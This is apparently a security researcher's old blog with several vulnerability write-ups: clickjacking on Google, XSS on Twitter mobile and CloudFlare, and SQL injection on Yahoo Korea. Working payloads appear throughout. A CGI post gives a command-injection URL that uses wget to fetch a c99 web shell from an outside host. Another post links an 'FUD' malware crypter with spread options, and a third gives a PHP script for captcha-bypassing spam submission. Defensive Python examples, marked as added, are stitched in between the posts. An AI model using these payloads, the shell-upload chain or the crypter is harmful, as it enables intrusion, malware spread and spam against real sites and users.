Change OAuth Target URL & Domain Description [ UI redress attack ]

May 10, 2013

I forgot to blog about another of my Google bugs. Nowadays I am busy with my start-up project! I hope to be back on bug bounty soon and will have some good blog posts out! :)

Changing the OAuth target URL and domain description can be achieved using a clickjacking vulnerability. Clickjacking is commonly known as an OWASP Top 10 vulnerability.

Status: Fixed

OAuth is cool and simple to understand; a developer can integrate with Google's OAuth endpoints seamlessly and effortlessly. Google provides a panel to manage the return URL and domain description at the following URL.

Vulnerable URL : https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com

On the page there are two input boxes, Target URL path prefix: and Domain description:, where the user submits the domain and description information.

As shown in the following image:

[Image: Change OAuth Domain & Description]

POC (not the actual PoC): <iframe src="https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com" width="600" height="600"></iframe>

Header Information :

As you can see, the header information captured below lacks any framing-protection header, which is what lets the page be loaded inside an iframe.

Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
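The fix for a clickjacking report like this one is a response header that forbids framing, and the corresponding check during triage is to read the response headers rather than the request. The following is an added example, not Google's code or anything from the original post: it evaluates a response header set the way a browser would (the CSP frame-ancestors directive takes precedence over X-Frame-Options) and reports whether a third-party origin could frame the page. The sample header sets and the third-party origin are constructed.

```python
"""Audit whether an HTTP response allows the page to be framed by another origin.

Added example; not Google's code. Header names and precedence rules are the
standard browser behaviour; the sample responses below are constructed.
"""
from urllib.parse import urlparse


def _origin(url: str) -> str:
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _source_matches(source: str, embedder: str, page: str) -> bool:
    """Match one frame-ancestors source expression against the embedder origin."""
    source = source.lower()
    e = urlparse(embedder)
    if source == "'none'":
        return False
    if source == "'self'":
        return _origin(embedder) == _origin(page)
    if source == "*":
        return True
    if source.endswith(":") and "://" not in source:      # scheme-source, e.g. https:
        return e.scheme == source[:-1]
    scheme, _, host = source.rpartition("://")             # host-source
    if scheme and scheme != e.scheme:
        return False
    hostport = host.split("/")[0]
    if hostport.startswith("*."):
        return e.hostname is not None and e.hostname.endswith(hostport[1:])
    return hostport == e.netloc or hostport == e.hostname


def frameable_by(headers: dict, page_url: str, embedder_url: str) -> bool:
    """True if a browser would let embedder_url put page_url in an iframe.

    Header names are matched case-insensitively. If Content-Security-Policy
    carries frame-ancestors, it decides; otherwise X-Frame-Options decides;
    with neither present the page is frameable by anyone.
    """
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            return any(_source_matches(s, embedder_url, page_url) for s in value.split())
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _origin(embedder_url) == _origin(page_url)
    # ALLOW-FROM is obsolete and ignored by current browsers; anything else,
    # including no header at all, leaves the page frameable.
    return True


# Constructed header sets: the situation in the post (no anti-framing header)
# next to two fixed variants.
UNPROTECTED = {"Content-Type": "text/html; charset=utf-8"}
FIXED_XFO = {"Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN"}
FIXED_CSP = {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.google.com"}

PAGE = "https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com"
THIRD_PARTY = "https://third-party.example"   # constructed embedding origin


def audit() -> dict:
    """Evaluate each header set against a third-party and a sibling-subdomain embedder."""
    return {
        "unprotected": frameable_by(UNPROTECTED, PAGE, THIRD_PARTY),
        "xfo_sameorigin": frameable_by(FIXED_XFO, PAGE, THIRD_PARTY),
        "csp_third_party": frameable_by(FIXED_CSP, PAGE, THIRD_PARTY),
        "csp_google_subdomain": frameable_by(FIXED_CSP, PAGE, "https://apis.google.com"),
    }


if __name__ == "__main__":
    for name, result in audit().items():
        print(f"{name:22s} frameable={result}")
```

Pointing the same function at a live capture means feeding it the response headers of the ManageDomain page; the request headers quoted above carry no information about frameability.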

Special thanks to the Google Security Team and the G4H (garage4hackers.com) team.

We Provide Penetration Testing

I am Listed in Twitter Security Page

February 7, 2012

Thank you Twitter, and especially Bob from Twitter, who was always in touch to resolve the Twitter vulnerabilities I reported.
Thank you Twitter for starting this kind of program to encourage information security researchers.

Link:

https://twitter.com/about/security

Screenshot:

[Image: Twitter security page listing]


Twitter [Mobile] Account Settings Cross Site Scripting and Multiple Html Injection

January 5, 2012

————————
0x1 Title: Twitter [Mobile] Account Settings Cross Site Scripting and Multiple HTML Injection Vulnerability
0x2 Script Link: https://mobile.twitter.com/settings
0x3 Author: Sandeep Kamble
0x4 Reported: December 28, 2011
0x5 Vulnerability Fix date: Jan 05, 2012
0x6 Public Release: Jan 05, 2012
0x7 Browser: Firefox, IE
0x8 OS: Win7, Ubuntu
——————————————————————–

Description of script:

Twitter provides features to protect user privacy: using account settings you can protect your tweets, change your username, change your password, and change your e-mail address.

Affected script URL:

URL #1: https://mobile.twitter.com/settings/screen_name
URL #2: https://mobile.twitter.com/settings/name

Vulnerability Description:

1) Cross Site Scripting Vulnerability (Twitter mobile is affected by user-side XSS, although it was protected against clickjacking):

A cross-site scripting attack is a type of injection in which malicious JavaScript is injected into a web site's dynamic pages.

2) HTML Injection Vulnerability (Twitter mobile is affected on the user side; one HTML injection was stored)

HTML injection is a type of injection in which malicious HTML code is injected into a web site's pages.

Exploit Description + Proof of Concept:

URL #1: https://mobile.twitter.com/settings/name

Title #1: Stored HTML Injection Vulnerability

In the above URL there is one input box to change the name. The HTML code of the input box is the following.

[Image 1: HTML code of the name input box]

Twitter allows only 20 characters in the name field.
If we try executing malicious HTML code, the HTML code looks as follows:

HTML Code : ">sandeep

[Image 2: the name field with the injected HTML]

The malicious HTML code executed successfully with the correct syntax of the input box. The following shows the output of the above input box code execution.

[Image 4: output of the above input box code execution]

URL #2: https://mobile.twitter.com/settings/name
Title #2: Cross Site Scripting and HTML Injection Vulnerability

In the above URL there is one input box to change the user name. The HTML code of the input box is the following.

[Image 7: HTML code of the user name input box]

In the input box we can execute JavaScript as well as HTML code, so it is vulnerable to cross-site scripting and HTML code injection.

JS : "><script>alert(document.domain)</script>

[Image 9: the user name field with the injected JS]

The malicious JS code executed successfully with the correct syntax of the input box. The following shows the output of the above input box code execution.

[Image 100: output of the above input box code execution]

Similarly we can execute HTML code, but it is not stored HTML code execution.

[Image 5: reflected HTML injection in the user name field]

Check out the video here:

http://dl.dropbox.com/u/18007092/twitter.swf

Countermeasure

1) Determine whether HTML output includes input parameters
2) In short, perform input sanitization


Warm Regards,
Sandeep Kamble
www.sandeepkamble.com


http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability

October 17, 2011

0x1 Site : http://anti-virus.cloudflare.com
0x3 Author : Sandeep Kamble
0x4 Reported : October 12, 2011
0x6 Public Release : October 17, 2011
0x7 Status: Fixed

Description :

Anti-virus.cloudflare.com is a service for avoiding spam.
The project aims to stop attacks and to educate visitors with infected computers about how they can clean up their machines.

Affected Variable :
?b_src=

Exploit :
JavaScript can be executed through the vulnerable variable ?b_src=. This attack is commonly known as Cross Site Scripting (XSS).
The affected anti-virus.cloudflare.com script has a stored XSS, which can be used for grabbing cookies.

POC :

Screenshot:

[Image: Cloud XSS]

Countermeasure :

1) Determine whether HTML output includes input parameters
2) In short, perform input sanitization
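Both countermeasure lists above (the Twitter mobile post and this CloudFlare post) come down to the same rule: encode for the context the value lands in before it reaches HTML output. The following is an added example, not Twitter's or CloudFlare's code: it renders the two payloads quoted in the Twitter post through a raw-interpolation template and an encoding template, for both an attribute context (the name field) and an element text context (a reflected parameter like b_src). The templates and the small probe parser are constructed; the probe reads the fragment the way a browser would, so the result is the set of tags a browser would actually execute.

```python
"""Render untrusted input into HTML without letting it leave its context.

Added example; not Twitter's or CloudFlare's code. The two payloads are the
ones quoted in the Twitter post; the templates and probe are constructed.
"""
import html
from html.parser import HTMLParser


def render_name_field_unsafe(name: str) -> str:
    """The reported pattern: a double quote in `name` closes the attribute."""
    return f'<input type="text" name="name" value="{name}">'


def render_name_field(name: str) -> str:
    """Attribute context: encode &, <, >, " and ' before interpolating."""
    return f'<input type="text" name="name" value="{html.escape(name, quote=True)}">'


def render_referrer_unsafe(b_src: str) -> str:
    """Element text context with the value reflected verbatim."""
    return f"<p>Referred by: {b_src}</p>"


def render_referrer(b_src: str) -> str:
    """Element text context: html.escape neutralises < and > (and quotes)."""
    return f"<p>Referred by: {html.escape(b_src)}</p>"


class _Probe(HTMLParser):
    """Collects the tags a browser would see and the parsed `value` attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")   # entity-decoded by the parser


def probe(fragment: str) -> _Probe:
    p = _Probe()
    p.feed(fragment)
    p.close()
    return p


def injected_tags(fragment: str, template_tags: tuple) -> list:
    """Tags present in the fragment that the template itself did not emit."""
    extra = probe(fragment).tags
    for t in template_tags:
        if t in extra:
            extra.remove(t)
    return extra


XSS = '"><script>alert(document.domain)</script>'   # payload from the Twitter post
HTML_INJ = '">sandeep'                               # payload from the Twitter post


def demo() -> dict:
    """Summarise what each renderer does with the two payloads."""
    return {
        "html_inj_fits_20_chars": len(HTML_INJ) <= 20,
        "unsafe_attr_value": probe(render_name_field_unsafe(HTML_INJ)).input_value,
        "safe_attr_value": probe(render_name_field(HTML_INJ)).input_value,
        "unsafe_attr_extra_tags": injected_tags(render_name_field_unsafe(XSS), ("input",)),
        "safe_attr_extra_tags": injected_tags(render_name_field(XSS), ("input",)),
        "unsafe_text_extra_tags": injected_tags(render_referrer_unsafe(XSS), ("p",)),
        "safe_text_extra_tags": injected_tags(render_referrer(XSS), ("p",)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:24s} {value!r}")
```

The 20-character limit on the name field is no protection: the stored HTML injection payload is 9 characters long. With encoding in place the browser still sees the user's full text, but as the attribute value or as text, never as markup.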

Conclusion

I would like to thank the CloudFlare Security Team for their quick responses to my reports.


RCE to shell upload [CGI]

September 27, 2011

Author: Sandeep Kamble
Release Date: September 9, 2010

Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept information passed from the client as a replacement for the specified target.

Vulnerabilities:-

1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.

Example site:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995

Exploit:-
The front-end interface to a CGI program is an HTML document called a form. Forms include the HTML tag "Input". Each "Input" tag has a variable name associated with it. This is the variable name that forms the left-hand side of the previously mentioned variable=value token. The contents of the variable form the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the "Input" field. However, if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the "Input" data will pass the data directly to the interpreter.

Example:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|

Shell upload command:-

http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|

Shell:-

http://www.victim.com/newswire/uploadedimage.php
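The defect behind the whole chain above is the one named in the Exploit section: the `article` value goes to the interpreter unvalidated, so `|` stops being part of a filename and starts a command. The following is an added example, not code from the site described: a CGI-style handler in Python that allowlists the parameter against the numeric `id.id` shape shown in the example URLs, rejects anything else with a 400, and resolves the article to a file inside a fixed directory without ever building a command line. The article store, the request URLs and the responses are constructed.

```python
"""Validate a CGI query parameter before anything interprets it.

Added example; not the site's code. The article store and requests are
constructed. The bug the post describes is an interpreted script handing
`article` to a shell, where `|` starts a new command; the fix is an
allowlist on the parameter plus a lookup that never spawns a shell.
"""
import re
import tempfile
from pathlib import Path
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# The only shape the example URLs use: digits, a dot, digits.
ARTICLE_ID = re.compile(r"\d{1,20}\.\d{1,20}")


def parse_article_param(url: str) -> Optional[str]:
    """Return the `article` query value if it is well formed, else None."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = qs.get("article", [])
    if len(values) != 1:                       # missing or duplicated parameter
        return None
    return values[0] if ARTICLE_ID.fullmatch(values[0]) else None


def serve_article(url: str, store: Path) -> Tuple[int, str]:
    """CGI-style handler returning (status, body); reads a file, runs no command."""
    article = parse_article_param(url)
    if article is None:
        return 400, "bad article id"
    path = (store / f"{article}.txt").resolve()
    # Belt and braces: even a validated id must resolve inside the store.
    if path.parent != store.resolve() or not path.is_file():
        return 404, "no such article"
    return 200, path.read_text(encoding="utf-8")


BASE = "http://www.victim.com/newswire/newsaction.cgi?article="


def demo() -> dict:
    """Run the handler over a constructed store with four constructed requests."""
    with tempfile.TemporaryDirectory() as d:
        store = Path(d)
        (store / "999999998473.992039800995.txt").write_text(
            "constructed article body", encoding="utf-8")
        return {
            "valid": serve_article(BASE + "999999998473.992039800995", store),
            "pipe": serve_article(BASE + "999999998473.992039800995|pwd|", store),
            "duplicate": serve_article(BASE + "1.2&article=3.4", store),
            "unknown": serve_article(BASE + "1.2", store),
        }


if __name__ == "__main__":
    for name, (status, body) in demo().items():
        print(f"{name:10s} {status} {body}")
```

The 400 for the piped request is also the line worth alerting on in the web server log: a request to a CGI script whose parameters contain `|`, `;` or `%20wget` is the signature of the attempt, whether or not the script was vulnerable.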

Conclusion:-

The improper use of CGI scripts affords users a number of vulnerabilities in system security. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.

After the shell upload you can try for more. I hope you find it useful; be safe!


XCrypt & USG 1.3 [FUD]

September 25, 2011

This is a crypter with Universal Stub Generator 1.3; USG is written in VB.NET.
It has spread options (P2P, USB and startup),
file clone, icon and file info, and then the other PE options you see listed, like add section, strip relocations, change entry point, etc.

Make Your Stuff FUD

http://dl.dropbox.com/u/18007092/XCrypt%20%26%20USG%201.3.rar


Add URL to Google.com Captcha Bypass

September 12, 2011
This captcha bypass allows a spammer to submit a large number of websites (possibly more than 1000) to the Google crawler by writing a simple program in any programming language.

Original link (With captcha):
www.google.com/addurl/?continue=/addurl

Bypass captcha link POC:  http://www.google.com/addurl?q=www.mysite.com&hl=&dqq=

If you execute the above URL in the browser, it will add the new website to Google's crawl database.

The following program can be used to submit a large number of websites at a time.

PHP Code 

<?php
@if(isset($_POST)){
$part1 = "http://www.google.com/addurl?q=";
$part2 = "&hl=&dqq=";
$curl = curl_init("http://google.com");
curl_exec($curl);

$urls=$_POST["urls"];

$lines=explode("\n",$urls);
 
foreach($lines as $line)
{
    $new = str_replace(" ", "", $part1.$line.$part2);
    curl_setopt($curl,CURLOPT_URL,$new);
}}
echo "done.";
?>
<html>
<head>
<title>Google Add Urls</title>
</head>
<body>
<form>
<textarea name="urls" cols="20" rows="100"></textarea><br />
<input type="submit" value="add urls" />
</form>
</body>
</html>

This may be a small vulnerability, but still we want Google to be the most secure! So please try to fix it. Otherwise there will be no use for the captcha.

Now Google has patched this vuln :)

/peace

Sandeep k.

Yahoo Korea SQL XSS vulnerability

August 9, 2011

Author : Sandeep Kamble
Date : 21/03/2010
Domain : blogshop.yahoo.co.kr
Risk : High
Status : Fixed

Overview:

Yahoo Korea has Blog-shop, which is one of the most famous sub-domains in Korea.
A cross-site scripting (XSS) vulnerability affects blogshop.yahoo.co.kr, which at the time of submission ranked 4 on the web according to Alexa.

Exploit Description :

It has SQL injection in the notice_read.html?key script. I was successful in retrieving Yahoo users' cookies from this SQL injection by inserting JavaScript into the SQL injection payload.

POC (Proof Of Concept ):

http://blogshop.yahoo.co.kr/data/notice_read.html?key=-16'/**/UNION/**/SELECT/**/1,2,3,4,@@version,%3Cscript%3Ealert('XSS HERE');</script>,7,8,9,0,1,2,3,4,5,6,7--%20

[Image: Yahoo Korea XSS]
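The payload above works only because the `key` value is spliced into the statement text, so a closing quote and a UNION become SQL. The following is an added example, not Yahoo's code: it rebuilds the shape of the bug on a constructed three-column SQLite table (the post's query had seventeen columns and targeted MySQL's @@version; the payload here is adapted to the constructed table and uses sqlite_version()), and puts the parameterised query beside it. With binding, the whole payload is compared against the id column as a string and matches nothing.

```python
"""Bind the `key` parameter instead of splicing it into SQL.

Added example; not Yahoo's code. Table, rows and column names are
constructed; the payload is the post's, adapted to three columns.
"""
import sqlite3

# Constructed stand-in for the notice table behind notice_read.html?key=
ROWS = [
    (16, "Shop notice", "constructed body text"),
    (17, "Second notice", "more constructed text"),
]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notice (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO notice VALUES (?, ?, ?)", ROWS)
    return db


def read_notice_unsafe(db: sqlite3.Connection, key: str) -> list:
    """The vulnerable shape: the parameter becomes part of the statement text."""
    sql = f"SELECT id, title, body FROM notice WHERE id='{key}'"
    return db.execute(sql).fetchall()


def read_notice(db: sqlite3.Connection, key: str) -> list:
    """Parameter binding: the driver sends the value separately from the SQL,
    so quotes, comments and UNION inside it are just characters in a string."""
    return db.execute("SELECT id, title, body FROM notice WHERE id=?", (key,)).fetchall()


# The post's payload, adapted to the three constructed columns: close the
# quote, UNION in attacker-chosen values, comment out the trailing quote.
PAYLOAD = "-16'/**/UNION/**/SELECT/**/1,sqlite_version(),'<script>XSS HERE</script>'--"


def demo() -> dict:
    db = make_db()
    return {
        "valid_key_bound": read_notice(db, "16"),
        "payload_bound": read_notice(db, PAYLOAD),
        "payload_spliced": read_notice_unsafe(db, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:16s} {rows}")
```

Binding fixes the injection; it does not by itself fix the XSS the post chained onto it, because the injected row's text still travels to the page. Whatever `read_notice` returns must go through the output encoding shown in the countermeasure example earlier, so that even a legitimately stored `<script>` in a notice body renders as text.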

Special thanks to Gaurav Kumar (www.lexcodetechnologies.com)

Regards,

Sandeep Kamble


About my blog & me

July 21, 2011

This is my personal blog; I am going to share personal things related to IT security. I am going to share all my experiences related to information technology.

Special thanks to Sahil Sir, Kalpesh Sir, Ayesha mam, shaista mam & my team :) and my friends Kishor , Lalit , Jitu ,Mug .

My Gmail : sandeepk.l337@gmail.com

